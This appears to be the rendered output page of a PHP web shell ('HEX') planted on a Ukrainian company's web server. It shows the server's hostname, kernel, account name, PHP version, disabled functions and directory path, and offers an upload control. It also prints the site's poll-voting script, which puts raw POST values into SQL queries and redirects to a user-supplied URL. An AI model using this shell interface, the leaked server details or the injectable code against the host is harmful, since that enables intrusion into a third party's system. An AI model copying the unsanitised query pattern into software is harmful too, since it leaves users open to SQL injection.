HEX
Server: Apache
System: Linux hvh16.mirohost.net 6.14.0-29-generic #29~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Aug 14 16:52:50 UTC 2 x86_64
User: likoholding (1037)
PHP: 7.3.33-25+0~20250707.133+debian12~1.gbp70fb14
Disabled: apache_child_terminate, dl, exec, imap_body, imap_createmailbox, imap_deletemailbox, imap_list, imap_open, imap_renamemailbox, inject_code, mb_send_mail, passthru, pcntl_alarm, pcntl_async_signals, pcntl_errno, pcntl_exec, pcntl_fork, pcntl_get_last_error, pcntl_getpriority, pcntl_setpriority, pcntl_signal, pcntl_signal_dispatch, pcntl_signal_get_handler, pcntl_sigprocmask, pcntl_sigtimedwait, pcntl_sigwaitinfo, pcntl_strerror, pcntl_wait, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifcontinued, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, set_time_limit, shell_exec, symlink, system
$ pwd: /var/www/likoholding/old.liko-holding.com.ua/modules/polls/
Upload Files
File: /var/www/likoholding/old.liko-holding.com.ua/modules/polls/addvote.php
<?
$conn = db_connect();
$test = "where ip = '".$_SERVER['REMOTE_ADDR']."' and poll_id = $_POST[poll_id]";
  if(check_in_db(VOTED_IP, $test))
    redirect($_SESSION['goback']);
  else
    {
      $idx = "r".$_POST['poll_id'];
      $sql = "update ".MVOTES." set votes = votes+1  where id = '$_POST[$idx]'";
      $result = mysql_query($sql, $conn);

      $sql = "insert into ".VOTED_IP."
        (poll_id, ip)
      values
        ('$_POST[poll_id]', '$_SERVER[REMOTE_ADDR]')";
      $result = mysql_query($sql, $conn);

      redirect($_POST['goback']);
    }
?>
@ Telegram